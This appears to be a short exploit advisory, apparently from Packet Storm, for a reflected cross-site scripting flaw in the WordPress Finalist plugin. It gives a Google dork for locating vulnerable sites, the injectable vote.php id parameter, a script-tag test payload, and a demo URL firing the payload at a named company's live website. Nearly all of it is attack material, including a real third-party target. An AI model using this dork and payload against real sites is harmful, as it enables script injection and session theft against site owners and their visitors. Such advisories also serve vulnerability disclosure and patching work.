WordPress Finalist plugin suffers from a cross site scripting vulnerability.
ced8ea299e2428f2cea7a17ff3e128f07621ee25909202fdb466986ed54770b5#######################################################################
# Exploit Title : Wordpress finalist Plugin Cross site scripting
#
# Exploit Author : Ashiyane Digital Security Team
#
# Google Dork : inurl:wp-content/plugins/finalist
#
# Software Link : www.wordpress.org
#
# Tested on: Windows , Linux
#
# Date: 2013/10/14
#
#############################################
# Exploit : Cross site scripting
#
# Location1:
[Target]/wp-content/plugins/finalist/vote.php?id=[xss]
#
#
# Script For Test : "/><script>alert(1);</script>
#
##########################################
# Demo
#http://www.thefaceshop.com.sg/wp-content/plugins/finalist/vote.php?id=113%22/%3E%3Cscript%3Ealert%28/xss/%29;%3C/script%3E
##############
#
# Milad Hacking
#
# We Love Mohammad
#
##############
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed